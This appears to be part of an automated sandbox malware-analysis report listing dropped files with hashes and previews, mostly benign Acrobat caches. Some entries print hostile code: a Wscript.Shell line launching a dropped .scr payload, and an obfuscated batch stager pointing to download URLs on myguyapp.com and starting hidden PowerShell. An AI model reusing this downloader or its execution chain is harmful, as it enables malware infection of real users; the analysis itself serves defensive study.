                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfzdPeUkwRe9:YvXKXod2Zc0vkiGb8Ukee9
                                                                      MD5:78518B97EBD2690DA7A7BF34634663AE
                                                                      SHA1:218761D907F36DB20360A9C73C1B3E6A40E121B8
                                                                      SHA-256:DB0C5F43E376DA2608E25468FFF6CBE4463B4E994F89003B62D3FEC728EEC562
                                                                      SHA-512:68445543500EE4A5D95E02C56FE7598D64C3BEE7D50BBDA22062BB708D8C68EF8419956CA992B1A91D4975BEFBE27EC9FBA8A859955D3DF8E5097A620AA95640
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.288629391012672
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfYdPeUkwRe9:YvXKXod2Zc0vkiGg8Ukee9
                                                                      MD5:9C436FDE2080840610CB9A9024850332
                                                                      SHA1:43B2C6239DD4ABE50219BC7181E8939F3131CA03
                                                                      SHA-256:334F9C294EC03D9376BE40A90DEBF7414AD6C3FE17E9E3C4BC468472A89467A8
                                                                      SHA-512:287CF51B83C318759B8B4833488B03FBD9234D0A767C58C3F548409AA7BF5A64C09F055C144CC3097A19B193FAA33D774308D61B91E867E869A283E9C6C5A6ED
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):284
                                                                      Entropy (8bit):5.2744795770575985
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf+dPeUkwRe9:YvXKXod2Zc0vkiG28Ukee9
                                                                      MD5:8EFA1722E5E125336E4D95F739159579
                                                                      SHA1:0108AEFE811FAB3AD58434A680E4F0657F603237
                                                                      SHA-256:F00EDCB6267BF48A8FC62181D9F82ADA6F693C2C1F901067AC867F24393B3D77
                                                                      SHA-512:2D6BFF5B3A059D996710CC0CFD23D25D231F5FF7727A4F108C89EE962B5607697D4EEF60C88D66EFA994F4F145028D8DDE5A7B623A51A75CDD66926DF39187ED
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):291
                                                                      Entropy (8bit):5.272254637201912
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfbPtdPeUkwRe9:YvXKXod2Zc0vkiGDV8Ukee9
                                                                      MD5:FC45FC5F414E4C208B3E4649B95928C3
                                                                      SHA1:9EE224A48B2E658013B668716F026E1DE4717B09
                                                                      SHA-256:9B662F1D68103007F20CC0C0905CAE1A45CAE0FECC0079CCBBCD51043F1E59F7
                                                                      SHA-512:AF7FC0F365D552A9AA4DEA58F72A1DBE3764B27D9C975ACC8A3CA0905E213BE4644A2F139FC9B776D14B9F5F97EE313735EBF24D69998AFC3B82D49AE2A81C41
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):287
                                                                      Entropy (8bit):5.277044569216403
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf21rPeUkwRe9:YvXKXod2Zc0vkiG+16Ukee9
                                                                      MD5:F5CBAD9B22D383459D6537709C8FE1CC
                                                                      SHA1:D67ABB517252597030F013184A898FE8EF6732B1
                                                                      SHA-256:A751D4B1266F9A64AE86D5C2321D402C26E615374D6CA4A485EBBF07DDE6D4FD
                                                                      SHA-512:D07EA09529E0FD6E8937CEDA2DE821115E317D00D8ACD09E547C52EBE17F0E3B0084319A6C6BFEAFB4E6A06BA9B19C9516C8EE6FE3DD199B1326042283D6653C
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1090
                                                                      Entropy (8bit):5.668695052004936
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6Xg2zviamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSK:YvLuEBgkDMUJUAh8cvMK
                                                                      MD5:4950AB39D8D87CE3ADA5616E21016714
                                                                      SHA1:9800515410B116BB61FDE30555538790089E7E05
                                                                      SHA-256:F1DA010E268267C2430600CDFAE44DBCB1A6E461F45AE38A7E1CF33EAA2E66F7
                                                                      SHA-512:36EA5C8624A1C4DB6C8541FAC411D0FF2603FD0AE857E18B28380D85872A1D13B58CA98ABA91AAD0550D6D62F843A8FA24BC81D9505B4FE20A8AB07432999C14
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.253068828579654
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfshHHrPeUkwRe9:YvXKXod2Zc0vkiGUUUkee9
                                                                      MD5:C753277DA1F3DD68B7B2AD51F6429ED3
                                                                      SHA1:10C1FD0FF09238A25E9E536C13F658AB12ECD4BC
                                                                      SHA-256:FEA3EF0F551E6FEA6C9E91E4D0B185CED983DE9DDF82F64556C243792FBFB2B5
                                                                      SHA-512:BDA20B1D1DCEA712A5526878AB50211E69A8AFD6E84630D1EB91B41512A0E02D0C87913DCB70B5E3C1427D7E15FC0DDE3C20DA6723C69928A588AF993C34072F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):282
                                                                      Entropy (8bit):5.269025646757322
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJTqgFCrPeUkwRe9:YvXKXod2Zc0vkiGTq16Ukee9
                                                                      MD5:0E34699479C2E4799345E10EC8CDC3C2
                                                                      SHA1:A4ED64C7CAA04BB026CE45A51A46F5DC67EF38CE
                                                                      SHA-256:82F3C56FAF12E3549112F99C368882764B67F97638ED2894F3893939E3FEAA95
                                                                      SHA-512:C31C0C299D12B20C15FE9C034E46F6DB4C1A4D5C4FCA69C6B4A08D21E3CAF1D4512A5FA3C327C0D156F67D0BA59804F7F26973AA9D61F3F99BD1A104690AFA29
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2814
                                                                      Entropy (8bit):5.133181023293482
                                                                      Encrypted:false
                                                                      SSDEEP:24:YrM31LaKAWXBay9tpJvAt8NSlRAtPdZpo+jm8j0SS/geva2Tz7B2LSMChelH0qoa:Yr8vXpJAiNf1LNXBYzd6uelHJWUh9Rl
                                                                      MD5:8C0F758AECF7DF47BB7B34C170AD8D50
                                                                      SHA1:8537D119B9D377450228BFA6472386DC94A203A1
                                                                      SHA-256:D9024309E0F6C9E7E849AA79BFCA0A783368546B50E4F32CB9E48340FA32B152
                                                                      SHA-512:CFCC124D4A36418BE1A89AF4C419A53F67908990365248EF5E10DEF9DEAB0577502249B8CC8B0483C27B4BE2C22272F3815C33D96A1C5FE3CF4A771C0E2529AF
                                                                      Malicious:false
                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3da58886edfc52d7fcee8ee9b503eb9e","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734309197000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"384f02ef468bd9df67ebf6aa84bf0e56","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734309197000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"0cb5dd4bd1067fb5acd89470a9592485","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734309196000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"7cd84c9b91d46c45a953713c528fc48a","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734309196000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"dd22d95d2c932d325f168f22f79b1118","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734309196000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"6e1d7daaaf9ebf442ac26e59ee1a836b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):1.1872790342842436
                                                                      Encrypted:false
                                                                      SSDEEP:48:TGufl2GL7msEHUUUUUUUUiSvR9H9vxFGiDIAEkGVvpQ:lNVmswUUUUUUUUi+FGSItE
                                                                      MD5:FEA369017EF67820030935BC22AF9A60
                                                                      SHA1:FD66D2587C04249EB23FD063631D2C9B77266AF7
                                                                      SHA-256:912A79ABFF6C652BFE4133A2E97E0A78610ACD991053D69C1BB00EEE5E925D82
                                                                      SHA-512:E24B682E2855D718936138E468B621012976718FC8FED6EF03F7C8F1F9107402C2B641DBFCEFD6C3D8FC03FF79991C2AC574D595979732F38BB071F6FDF7EA9A
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.6074982597658818
                                                                      Encrypted:false
                                                                      SSDEEP:48:7MxKUUUUUUUUUUwvR9H9vxFGiDIAEkGVv5vqFl2GL7msz:7bUUUUUUUUUUIFGSItzvKVmsz
                                                                      MD5:492702B8F13022795C689697F72ECFE4
                                                                      SHA1:EAE23CC165709547BDE190E46B7CB6E6801020C9
                                                                      SHA-256:6D8801732C3ECAD779537692422C2B8DED34B740BAF460E7BB99B3EC4DD38EB2
                                                                      SHA-512:F226ACA5BDD31F0921AAE5F341DBB06E51653B3684E45F37DD3EC381BA0AF49DA8DB9EE6887A29AF632E0A2AE950FC1E3EA6C34489BC0770768182143E5EB5B4
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):66726
                                                                      Entropy (8bit):5.392739213842091
                                                                      Encrypted:false
                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg8pSK27EjUi6luH4RhZXqiHYyu:6a6TZ44ADE0SK27EjUJdHK
                                                                      MD5:A5AAD5D569ABF6BAC7DC4ADCE44301AD
                                                                      SHA1:D758696C43B21C7CD62D0687C0925B169A98E66D
                                                                      SHA-256:5DA6D694ABB4BA6A94A321BE34A59538D2F15B42CFCE7F3D7F4C6DC8FBBCCCE4
                                                                      SHA-512:FCADAEF719FD37C93BCF2769D1EE08B57418514C59C6ED6639BD8125DDE0C16081C13C5E7854F63C9B95B5170E9B8DD6592DE7E2A7405B0A06BFEB250F7EC288
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):184
                                                                      Entropy (8bit):4.734832042306239
                                                                      Encrypted:false
                                                                      SSDEEP:3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5mJKEufLOksaYuWGplZo5uWAX+Ro6p4EkD5ml:RiJBJHonwWDKaJkDjEYRswWGrywWDKaj
                                                                      MD5:C9EE39C71A07F0DFE15F88BC91618CE8
                                                                      SHA1:A55D4A3C53F75DEBA9EE14A89047931D59CF328F
                                                                      SHA-256:463231CD31CB7A685624EFD5A04ADC02BC1AFD6459488A5239AB5D4AEA071699
                                                                      SHA-512:EB6A76555ECB07A52815ACEB38FB21533FAA117F6A50F776CC9A9FDB011EBCD1ECDCADD12380333D4FB7CAB3F7865E0D4680F4DC41BB9EDD1D5C6069490986E1
                                                                      Malicious:true
                                                                      Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: c2.hta, Detection: malicious
                                                                      • Filename: c2.hta, Detection: malicious
                                                                      • Filename: c2.hta, Detection: malicious
                                                                      • Filename: FwR7as4xUq.exe, Detection: malicious
                                                                      • Filename: InsertSr.exe, Detection: malicious
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):257339
                                                                      Entropy (8bit):7.999363363076799
                                                                      Encrypted:true
                                                                      SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                      MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                      SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                      SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                      SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):3432
                                                                      Entropy (8bit):5.234062070088092
                                                                      Encrypted:false
                                                                      SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                      MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                      SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                      SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                      SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                      Malicious:true
                                                                      Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):21979
                                                                      Entropy (8bit):5.049158677118914
                                                                      Encrypted:false
                                                                      SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                      MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                      SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                      SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                      SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.62028134425878
                                                                      Encrypted:false
                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Joe Sandbox View:
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: c2.hta, Detection: malicious, Browse
                                                                      • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                      • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                      • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      • Filename: qaHUaPUib8.exe, Detection: malicious, Browse
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):257339
                                                                      Entropy (8bit):7.999363363076799
                                                                      Encrypted:true
                                                                      SSDEEP:6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
                                                                      MD5:606D3FBBD2B3F54B73E2B049EBC1CB66
                                                                      SHA1:E3D039B3F84158DBC882D62614AEC3A66766509F
                                                                      SHA-256:4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
                                                                      SHA-512:35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):65440
                                                                      Entropy (8bit):6.049806962480652
                                                                      Encrypted:false
                                                                      SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                      MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                      SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                      SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                      SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):89403
                                                                      Entropy (8bit):7.99813128639969
                                                                      Encrypted:true
                                                                      SSDEEP:1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
                                                                      MD5:3FF8403A4564EE7F0732F6A1ECEB194C
                                                                      SHA1:C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
                                                                      SHA-256:7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
                                                                      SHA-512:8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):89088
                                                                      Entropy (8bit):7.99803755231603
                                                                      Encrypted:true
                                                                      SSDEEP:1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
                                                                      MD5:DC54D0D4B55783075A2501B87D0C8D31
                                                                      SHA1:FEF29A787871C091260C34301D451BE56601CF53
                                                                      SHA-256:EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
                                                                      SHA-512:EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
